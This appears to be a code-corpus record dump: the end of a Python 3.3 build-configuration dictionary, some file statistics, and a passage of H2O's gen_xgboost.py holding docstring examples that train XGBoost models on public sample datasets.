Modules/arraymodule.o Modules/mathmodule.o Modules/_math.o Modules/_struct.o Modules/timemodule.o Modules/_randommodule.o Modules/atexitmodule.o Modules/_elementtree.o Modules/_pickle.o Modules/_datetimemodule.o Modules/_bisectmodule.o Modules/_heapqmodule.o Modules/unicodedata.o Modules/fcntlmodule.o Modules/spwdmodule.o Modules/grpmodule.o Modules/selectmodule.o Modules/socketmodule.o Modules/_posixsubprocess.o Modules/md5module.o Modules/sha1module.o Modules/sha256module.o Modules/sha512module.o Modules/syslogmodule.o Modules/binascii.o Modules/zlibmodule.o Modules/pyexpat.o Modules/posixmodule.o Modules/errnomodule.o Modules/pwdmodule.o Modules/_sre.o Modules/_codecsmodule.o Modules/_weakref.o Modules/_functoolsmodule.o Modules/operator.o Modules/_collectionsmodule.o Modules/itertoolsmodule.o Modules/_localemodule.o Modules/_iomodule.o Modules/iobase.o Modules/fileio.o Modules/bytesio.o Modules/bufferedio.o Modules/textio.o Modules/stringio.o Modules/zipimport.o Modules/faulthandler.o Modules/symtablemodule.o Modules/xxsubtype.o', 'AST_C': 'Python/Python-ast.c', 'HAVE_SYS_NDIR_H': 0, 'DESTDIRS': '/usr /usr/lib /usr/lib/python3.3 /usr/lib/python3.3/lib-dynload', 'HAVE_SIGNAL_H': 1, 'PACKAGE_TARNAME': 0, 'HAVE_GETPRIORITY': 1, 'INCLUDEDIR': '/usr/include', 'HAVE_INTTYPES_H': 1, 'SIGNAL_OBJS': '', 'HAVE_READV': 1, 'HAVE_SETHOSTNAME': 1, 'MODLIBS': '-lrt -lexpat -L/usr/lib -lz -lexpat', 'CC': 'i686-linux-gnu-gcc -pthread', 'HAVE_LCHMOD': 0, 'SIZEOF_UINTPTR_T': 4, 'LIBPC': '/usr/lib/i386-linux-gnu/pkgconfig', 'BYTESTR_DEPS': '\\', 'HAVE_MKDIRAT': 1, 'LIBPL': '/usr/lib/python3.3/config-3.3m-i386-linux-gnu', 'HAVE_SHADOW_H': 1, 'HAVE_SYS_EVENT_H': 0, 'INSTALL': '/usr/bin/install -c', 'HAVE_GCC_ASM_FOR_X87': 1, 'HAVE_BROKEN_UNSETENV': 0, 'BASECPPFLAGS': '', 'DOUBLE_IS_BIG_ENDIAN_IEEE754': 0, 'HAVE_STRUCT_STAT_ST_RDEV': 1, 'HAVE_SEM_UNLINK': 1, 'BUILDPYTHON': 'python', 'HAVE_RL_CATCH_SIGNAL': 1, 'HAVE_DECL_TZNAME': 0, 'RESSRCDIR': 'Mac/Resources/framework', 'HAVE_PTHREAD_SIGMASK': 1, 'HAVE_UTIMES': 1, 'DISTDIRS': 'Include Lib Misc Ext-dummy', 'HAVE_FDATASYNC': 1, 'HAVE_USABLE_WCHAR_T': 0, 'PY_FORMAT_SIZE_T': '"z"', 'HAVE_SCHED_SETSCHEDULER': 1, 'VA_LIST_IS_ARRAY': 0, 'HAVE_LINUX_NETLINK_H': 1, 'HAVE_SETREGID': 1, 'HAVE_STROPTS_H': 1, 'LDVERSION': '3.3m', 'abs_builddir': '/build/buildd/python3.3-3.3.1/build-shared', 'SITEPATH': '', 'HAVE_GETHOSTBYNAME': 0, 'HAVE_SIGPENDING': 1, 'HAVE_KQUEUE': 0, 'HAVE_SYNC': 1, 'HAVE_GETSID': 1, 'HAVE_ROUND': 1, 'HAVE_STRFTIME': 1, 'AST_H_DIR': 'Include', 'HAVE_PIPE2': 1, 'AST_C_DIR': 'Python', 'TESTPYTHONOPTS': '', 'HAVE_DEV_PTC': 0, 'GETTIMEOFDAY_NO_TZ': 0, 'HAVE_NET_IF_H': 1, 'HAVE_SENDFILE': 1, 'HAVE_SETPGRP': 1, 'HAVE_SEM_GETVALUE': 1, 'CONFIGURE_LDFLAGS': '-Wl,-Bsymbolic-functions -Wl,-z,relro', 'DLLLIBRARY': '', 'PYTHON_FOR_BUILD': './python -E', 'SETPGRP_HAVE_ARG': 0, 'HAVE_INET_ATON': 1, 'INSTALL_SHARED': '/usr/bin/install -c -m 555', 'WITH_DOC_STRINGS': 1, 'OPCODETARGETS_H': '\\', 'HAVE_INITGROUPS': 1, 'HAVE_LINKAT': 1, 'BASEMODLIBS': '', 'SGI_ABI': '', 'HAVE_SCHED_SETPARAM': 1, 'OPT': '-DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes', 'HAVE_POSIX_FADVISE': 1, 'datarootdir': '/usr/share', 'HAVE_MEMRCHR': 1, 'HGTAG': '', 'HAVE_MEMMOVE': 1, 'HAVE_GETRESUID': 1, 'DOUBLE_IS_ARM_MIXED_ENDIAN_IEEE754': 0, 'HAVE_LSTAT': 1, 'AR': 'ar', 'HAVE_WAIT4': 1, 'HAVE_SYS_MODEM_H': 0, 'INSTSONAME': 'libpython3.3m.so.1.0', 'HAVE_SYS_STATVFS_H': 1, 'HAVE_LGAMMA': 1, 'HAVE_PROTOTYPES': 1, 'HAVE_SYS_UIO_H': 1, 'MAJOR_IN_MKDEV': 0, 'QUICKTESTOPTS': '-x test_subprocess test_io test_lib2to3 \\', 'HAVE_SYS_DEVPOLL_H': 0, 'HAVE_CHFLAGS': 0, 'HAVE_FSYNC': 1, 'HAVE_FCHMOD': 1, 'INCLUDEPY': '/usr/include/python3.3m', 'HAVE_SEM_TIMEDWAIT': 1, 'LDLIBRARYDIR': '', 'HAVE_STRUCT_TM_TM_ZONE': 1, 'HAVE_CURSES_H': 1, 'TIME_WITH_SYS_TIME': 1, 'HAVE_DUP2': 1, 'ENABLE_IPV6': 1, 'WITH_VALGRIND': 0, 'HAVE_SETITIMER': 1, 'THREADOBJ': 'Python/thread.o', 'LOCALMODLIBS': '-lrt -lexpat -L/usr/lib -lz -lexpat', 'HAVE_MEMORY_H': 1, 'HAVE_GETITIMER': 1, 'HAVE_C99_BOOL': 1, 'INSTALL_DATA': '/usr/bin/install -c -m 644', 'PGEN': 'Parser/pgen', 'HAVE_GRP_H': 1, 'HAVE_WCSFTIME': 1, 'AIX_GENUINE_CPLUSPLUS': 0, 'HAVE_LIBINTL_H': 1, 'SHELL': '/bin/sh', 'HAVE_UNISTD_H': 1, 'EXTRATESTOPTS': '', 'HAVE_EXECV': 1, 'HAVE_FSEEK64': 0, 'MVWDELCH_IS_EXPRESSION': 1, 'DESTSHARED': '/usr/lib/python3.3/lib-dynload', 'OPCODETARGETGEN': '\\', 'LIBDEST': '/usr/lib/python3.3', 'CCSHARED': '-fPIC', 'HAVE_EXPM1': 1, 'HAVE_DLFCN_H': 1, 'exec_prefix': '/usr', 'HAVE_READLINK': 1, 'WINDOW_HAS_FLAGS': 1, 'HAVE_FTELL64': 0, 'HAVE_STRLCPY': 0, 'MACOSX_DEPLOYMENT_TARGET': '', 'HAVE_SYS_SYSCALL_H': 1, 'DESTLIB': '/usr/lib/python3.3', 'LDSHARED': 'i686-linux-gnu-gcc -pthread -shared -Wl,-O1 -Wl,-Bsymbolic-functions -Wl,-Bsymbolic-functions -Wl,-z,relro -Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ', 'HGVERSION': '', 'PYTHON_HEADERS': '\\', 'HAVE_STRINGS_H': 1, 'DOUBLE_IS_LITTLE_ENDIAN_IEEE754': 1, 'HAVE_POSIX_FALLOCATE': 1, 'HAVE_DIRFD': 1, 'HAVE_LOG2': 1, 'HAVE_GETPID': 1, 'HAVE_ALARM': 1, 'MACHDEP_OBJS': '', 'HAVE_SPAWN_H': 1, 'HAVE_FORK': 1, 'HAVE_SETRESGID': 1, 'HAVE_FCHMODAT': 1, 'HAVE_CLOCK_GETRES': 1, 'MACHDEPPATH': ':plat-i386-linux-gnu', 'STDC_HEADERS': 1, 'HAVE_SETPRIORITY': 1, 'LIBC': '', 'HAVE_SYS_EPOLL_H': 1, 'HAVE_SYS_UTSNAME_H': 1, 'HAVE_PUTENV': 1, 'HAVE_CURSES_RESIZE_TERM': 1, 'HAVE_FUTIMESAT': 1, 'WITH_DYLD': 0, 'INSTALL_PROGRAM': '/usr/bin/install -c', 'LIBS': '-lpthread -ldl -lutil', 'HAVE_TRUNCATE': 1, 'TESTOPTS': '', 'PROFILE_TASK': '../Tools/pybench/pybench.py -n 2 --with-gc --with-syscheck', 'HAVE_CURSES_RESIZETERM': 1, 'ABIFLAGS': 'm', 'HAVE_GETGROUPLIST': 1, 'OBJECT_OBJS': '\\', 'HAVE_MKNODAT': 1, 'HAVE_ST_BLOCKS': 1, 'HAVE_STRUCT_STAT_ST_GEN': 0, 'SYS_SELECT_WITH_SYS_TIME': 1, 'SHLIBS': '-lpthread -ldl -lutil', 'HAVE_GETGROUPS': 1, 'MODULE_OBJS': '\\', 'PYTHONFRAMEWORKDIR': 'no-framework', 'HAVE_FCNTL_H': 1, 'HAVE_LINK': 1, 'HAVE_SIGWAIT': 1, 'HAVE_GAMMA': 1, 'HAVE_SYS_LOCK_H': 0, 'HAVE_FORKPTY': 1, 'HAVE_SOCKADDR_SA_LEN': 0, 'HAVE_TEMPNAM': 1, 'HAVE_STRUCT_STAT_ST_BLKSIZE': 1, 'HAVE_MKFIFOAT': 1, 'HAVE_SIGWAITINFO': 1, 'HAVE_FTIME': 1, 'HAVE_EPOLL': 1, 'HAVE_SYS_SOCKET_H': 1, 'HAVE_LARGEFILE_SUPPORT': 1, 'CONFIGURE_CFLAGS': '-g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security', 'HAVE_PTHREAD_DESTRUCTOR': 0, 'CONFIGURE_CPPFLAGS': '-D_FORTIFY_SOURCE=2', 'HAVE_SYMLINK': 1, 'HAVE_LONG_LONG': 1, 'HAVE_IEEEFP_H': 0, 'LIBDIR': '/usr/lib', 'HAVE_PTHREAD_KILL': 1, 'TESTPATH': '', 'HAVE_STRDUP': 1, 'POBJS': '\\', 'NO_AS_NEEDED': '-Wl,--no-as-needed', 'HAVE_LONG_DOUBLE': 1, 'HGBRANCH': '', 'DISTFILES': 'README ChangeLog configure configure.ac acconfig.h pyconfig.h.in Makefile.pre.in', 'PTHREAD_SYSTEM_SCHED_SUPPORTED': 1, 'HAVE_FACCESSAT': 1, 'AST_ASDL': '../Parser/Python.asdl', 'CPPFLAGS': '-I. -IInclude -I../Include -D_FORTIFY_SOURCE=2', 'HAVE_MKTIME': 1, 'HAVE_NDIR_H': 0, 'PY_CFLAGS': '-Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ', 'LIBOBJDIR': 'Python/', 'HAVE_LINUX_CAN_RAW_H': 1, 'HAVE_GETHOSTBYNAME_R_3_ARG': 0, 'PACKAGE_STRING': 0, 'GNULD': 'yes', 'LOG1P_DROPS_ZERO_SIGN': 0, 'HAVE_FTRUNCATE': 1, 'WITH_LIBINTL': 0, 'HAVE_MREMAP': 1, 'HAVE_DECL_ISNAN': 1, 'HAVE_KILLPG': 1, 'SIZEOF_LONG': 4, 'HAVE_DECL_ISFINITE': 1, 'HAVE_IPA_PURE_CONST_BUG': 0, 'WITH_PYMALLOC': 1, 'abs_srcdir': '/build/buildd/python3.3-3.3.1/build-shared/..', 'HAVE_FCHDIR': 1, 'HAVE_BROKEN_POSIX_SEMAPHORES': 0, 'AC_APPLE_UNIVERSAL_BUILD': 0, 'PGENSRCS': '\\ \\', 'DIRMODE': 755, 'HAVE_GETHOSTBYNAME_R': 1, 'HAVE_LCHFLAGS': 0, 'HAVE_SYS_PARAM_H': 1, 'SIZEOF_LONG_DOUBLE': 12, 'CONFIG_ARGS': "'--enable-shared' '--prefix=/usr' '--enable-ipv6' '--enable-loadable-sqlite-extensions' '--with-dbmliborder=bdb:gdbm' '--with-computed-gotos' '--with-system-expat' '--with-system-ffi' '--with-fpectl' 'CC=i686-linux-gnu-gcc' 'CFLAGS=-g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ' 'LDFLAGS=-Wl,-Bsymbolic-functions -Wl,-z,relro' 'CPPFLAGS=-D_FORTIFY_SOURCE=2'", 'HAVE_SCHED_H': 1, 'HAVE_KILL': 1}
| 6,055.666667
| 18,165
| 0.710519
| 2,763
| 18,167
| 4.355411
| 0.296779
| 0.073542
| 0.015955
| 0.014625
| 0.192621
| 0.162955
| 0.143676
| 0.123567
| 0.114426
| 0.102294
| 0
| 0.039417
| 0.086696
| 18,167
| 2
| 18,166
| 9,083.5
| 0.685873
| 0
| 0
| 0
| 0
| 14
| 0.754982
| 0.186337
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
130f776ce8d86c26f26ea2e92d5b463a65ad577b
| 47,408
|
py
|
Python
|
h2o-bindings/bin/custom/python/gen_xgboost.py
|
ahmedengu/h2o-3
|
ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11
|
[
"Apache-2.0"
] | 1
|
2020-10-21T05:09:23.000Z
|
2020-10-21T05:09:23.000Z
|
h2o-bindings/bin/custom/python/gen_xgboost.py
|
ahmedengu/h2o-3
|
ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11
|
[
"Apache-2.0"
] | 1
|
2020-05-10T15:33:07.000Z
|
2020-05-10T15:33:07.000Z
|
h2o-bindings/bin/custom/python/gen_xgboost.py
|
ahmedengu/h2o-3
|
ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11
|
[
"Apache-2.0"
] | 1
|
2020-04-17T13:06:26.000Z
|
2020-04-17T13:06:26.000Z
|
def class_extensions():
@staticmethod
def available():
"""
Ask the H2O server whether a XGBoost model can be built (depends on availability of native backends).
:return: True if a XGBoost model can be built, or False otherwise.
:examples:
>>> boston = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/BostonHousing.csv")
>>> predictors = boston.columns[:-1]
>>> response = "medv"
>>> boston['chas'] = boston['chas'].asfactor()
>>> train, valid = boston.split_frame(ratios=[.8])
>>> boston_xgb = H2OXGBoostEstimator(seed=1234)
>>> boston_xgb.available()
"""
if "XGBoost" not in h2o.cluster().list_core_extensions():
print("Cannot build an XGBoost model - no backend found.")
return False
else:
return True
extensions = dict(
__imports__="""import h2o""",
__class__=class_extensions,
)
doc = dict(
__class__="""
Builds an eXtreme Gradient Boosting model using the native XGBoost backend.
""",
)
examples = dict(
training_frame="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
validation_frame="""
>>> insurance = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/insurance.csv")
>>> insurance['Group'] = insurance['Group'].asfactor()
>>> insurance['Age'] = insurance['Age'].asfactor()
>>> predictors = insurance.columns[0:4]
>>> response = 'Claims'
>>> train, valid = insurance.split_frame(ratios=[.8],
... seed=1234)
>>> insurance_xgb = H2OXGBoostEstimator(seed=1234)
>>> insurance_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(insurance_xgb.mse(valid=True))
""",
nfolds="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> folds = 5
>>> titanic_xgb = H2OXGBoostEstimator(nfolds=folds,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=titanic)
>>> titanic_xgb.auc(xval=True)
""",
keep_cross_validation_models="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(keep_cross_validation_models=True,
... nfolds=5 ,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> titanic_xgb.cross_validation_models()
""",
keep_cross_validation_predictions="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(keep_cross_validation_predictions=True,
... nfolds=5,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> titanic_xgb.cross_validation_predictions()
""",
keep_cross_validation_fold_assignment="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(keep_cross_validation_fold_assignment=True,
... nfolds=5,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> titanic_xgb.cross_validation_fold_assignment()
""",
score_each_iteration="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(score_each_iteration=True,
... ntrees=55,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.scoring_history()
""",
fold_assignment="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> assignment_type = "Random"
>>> titanic_xgb = H2OXGBoostEstimator(fold_assignment=assignment_type,
... nfolds=5,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=titanic)
>>> titanic_xgb.auc(xval=True)
""",
fold_column="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> fold_numbers = titanic.kfold_column(n_folds=5,
... seed=1234)
>>> fold_numbers.set_names(["fold_numbers"])
>>> titanic = titanic.cbind(fold_numbers)
>>> print(titanic['fold_numbers'])
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=titanic,
... fold_column="fold_numbers")
>>> titanic_xgb.auc(xval=True)
""",
ignore_const_cols="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> titanic["const_1"] = 6
>>> titanic["const_2"] = 7
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234,
... ignore_const_cols=True)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
weights_column="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
stopping_rounds="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(stopping_metric="auc",
... stopping_rounds=3,
... stopping_tolerance=1e-2,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.auc(valid=True)
""",
stopping_metric="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8], seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(stopping_metric="auc",
... stopping_rounds=3,
... stopping_tolerance=1e-2,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.auc(valid=True)
""",
stopping_tolerance="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(stopping_metric="auc",
... stopping_rounds=3,
... stopping_tolerance=1e-2,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.auc(valid=True)
""",
max_runtime_secs="""
>>> covtype = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/covtype/covtype.20k.data")
>>> covtype[54] = covtype[54].asfactor()
>>> predictors = covtype.columns[0:54]
>>> response = 'C55'
>>> train, valid = covtype.split_frame(ratios=[.8],
... seed=1234)
>>> cov_xgb = H2OXGBoostEstimator(max_runtime_secs=10,
... ntrees=10000,
... max_depth=10,
... seed=1234)
>>> cov_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(cov_xgb.logloss(valid=True))
""",
seed="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8], seed=1234)
>>> xgb_w_seed_1 = H2OXGBoostEstimator(col_sample_rate=.7,
... seed=1234)
>>> xgb_w_seed_1.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> xgb_w_seed_2 = H2OXGBoostEstimator(col_sample_rate = .7,
... seed = 1234)
>>> xgb_w_seed_2.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print('auc for the 1st model built with a seed:',
... xgb_w_seed_1.auc(valid=True))
>>> print('auc for the 2nd model built with a seed:',
... xgb_w_seed_2.auc(valid=True))
""",
distribution="""
>>> cars = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/junit/cars_20mpg.csv")
>>> predictors = ["displacement","power","weight","acceleration","year"]
>>> response = "cylinders"
>>> train, valid = cars.split_frame(ratios=[.8],
... seed=1234)
>>> cars_xgb = H2OXGBoostEstimator(distribution="poisson",
... seed=1234)
>>> cars_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> cars_xgb.mse(valid=True)
""",
tweedie_power="""
>>> insurance = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/insurance.csv")
>>> predictors = insurance.columns[0:4]
>>> response = 'Claims'
>>> insurance['Group'] = insurance['Group'].asfactor()
>>> insurance['Age'] = insurance['Age'].asfactor()
>>> train, valid = insurance.split_frame(ratios=[.8],
... seed=1234)
>>> insurance_xgb = H2OXGBoostEstimator(distribution="tweedie",
... tweedie_power=1.2,
... seed=1234)
>>> insurance_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(insurance_xgb.mse(valid=True))
""",
categorical_encoding="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> encoding = "one_hot_explicit"
>>> airlines_xgb = H2OXGBoostEstimator(categorical_encoding=encoding,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.auc(valid=True)
""",
quiet_mode="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8], seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234, quiet_mode=True)
>>> titanic_xgb.train(x=predictors
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.mse(valid=True)
""",
checkpoint="""
>>> cars = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/junit/cars_20mpg.csv")
>>> cars["economy_20mpg"] = cars["economy_20mpg"].asfactor()
>>> predictors = ["displacement","power","weight","year","economy_20mpg"]
>>> response = "acceleration"
>>> from h2o.estimators import H2OXGBoostEstimator
>>> cars_xgb = H2OXGBoostEstimator(seed=1234)
>>> train, valid = cars.split_frame(ratios=[.8])
>>> cars_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> cars_xgb.mse()
>>> cars_xgb_continued = H2OXGBoostEstimator(checkpoint=cars_xgb.model_id,
... ntrees=51,
... seed=1234)
>>> cars_xgb_continued.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> cars_xgb_continued.mse()
""",
export_checkpoints_dir="""
>>> import tempfile
>>> from h2o.grid.grid_search import H2OGridSearch
>>> from os import listdir
>>> airlines = h2o.import_file("http://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip", destination_frame="air.hex")
>>> predictors = ["DayofMonth", "DayOfWeek"]
>>> response = "IsDepDelayed"
>>> hyper_parameters = {'ntrees': [5,10]}
>>> search_crit = {'strategy': "RandomDiscrete",
... 'max_models': 5,
... 'seed': 1234,
... 'stopping_rounds': 3,
... 'stopping_metric': "AUTO",
... 'stopping_tolerance': 1e-2}
>>> checkpoints_dir = tempfile.mkdtemp()
>>> air_grid = H2OGridSearch(H2OXGBoostEstimator,
... hyper_params=hyper_parameters,
... search_criteria=search_crit)
>>> air_grid.train(x=predictors,
... y=response,
... training_frame=airlines,
